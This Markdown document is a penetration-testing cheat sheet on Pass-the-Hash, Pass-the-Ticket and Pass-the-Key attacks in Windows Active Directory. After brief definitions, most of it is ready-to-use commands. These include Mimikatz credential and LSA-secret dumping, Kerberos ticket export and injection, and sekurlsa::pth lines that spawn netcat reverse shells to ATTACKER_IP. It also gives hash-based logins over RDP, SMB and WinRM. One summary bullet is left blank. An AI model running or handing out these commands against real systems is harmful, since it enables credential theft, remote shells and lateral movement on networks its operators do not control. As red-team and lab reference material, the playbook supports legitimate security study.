92 lines
3.6 KiB
Markdown

## General

Alternate authentication with Pass-the-Hash (PtH), Pass-the-Ticket (PtT) and Pass-the-Key (PtK) refers to methods of authenticating to a system without providing a plaintext password.

Pass-the-Hash (PtH) is an attack technique that allows an attacker to use a stolen password hash to authenticate to a system, without needing to know the plaintext password. This can be done by capturing the NTLM or LM hash of a user's password, which is stored on a Windows system when the user logs in.

Pass-the-Ticket (PtT) is an attack technique that allows an attacker to use a stolen Kerberos ticket to authenticate to a system, without needing to know the plaintext password. This can be done by capturing the Kerberos ticket that is issued to a user when they log in, and then using it to authenticate to other systems on the network.

Pass-the-Key (PtK) is an attack technique that allows an attacker to use a stolen Kerberos encryption key (the RC4, AES128 or AES256 key derived from the user's password) to authenticate to a system, without needing to know the plaintext password. This can be done by capturing the key that Kerberos uses to encrypt the user's tickets and then using it in place of the password to obtain tickets (stealing the key that encrypts the tickets).

All these methods are used by attackers to gain unauthorized access to a system by bypassing normal authentication mechanisms.

- PtH = Using the hash to connect
- PtT = Using the ticket to connect
- PtK =

### Local vs Active Directory

While using tools such as Mimikatz, you can gather local hashes and Active Directory hashes from users. Note that Mimikatz is not the only tool you can use to find hashes, tickets and keys.

## Commands

To begin, one must acquire some hashes, tickets or keys. This can be done using tools such as Mimikatz.

- Upload Mimikatz to the target system

## Alternate Authentication (PtH)

```
mimikatz # privilege::debug
mimikatz # token::elevate

# Local users
mimikatz # lsadump::sam

# AD users
mimikatz # sekurlsa::msv

# Set up a listener (attacking machine)
nc -lvnp PORT

# Launch a reverse shell (this uses nc64 on the other machine; other techniques can launch a reverse shell, e.g. smb/psexec in msfconsole)
mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:NTLM_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
```

- Other techniques to pass the hash:

```
RDP   --> xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH
SMB   --> psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
WinRM --> evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH
```

## Alternate Authentication (PtT)

```
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

# We can inject the tickets into the current session
mimikatz # kerberos::ptt [0;427fcd5]-2-0-40e10000-USER@MACHINE_DOMAIN   (replace with the name of the exported ticket file)

# Check whether the ticket was loaded and what it grants
C:\> klist
```

## Alternate Authentication (PtK)

```
mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys

# Set up a listener (attacking machine)
nc -lvnp PORT
```

**If we have the RC4 hash:**

```shell-session
mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /rc4:RC4_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
```

**If we have the AES128 hash:**

```shell-session
mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /aes128:AES128_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
```

**If we have the AES256 hash:**

```shell-session
mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /aes256:AES256_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
```

## Dump LSA secrets

```
mimikatz # token::elevate
mimikatz # lsadump::secrets
```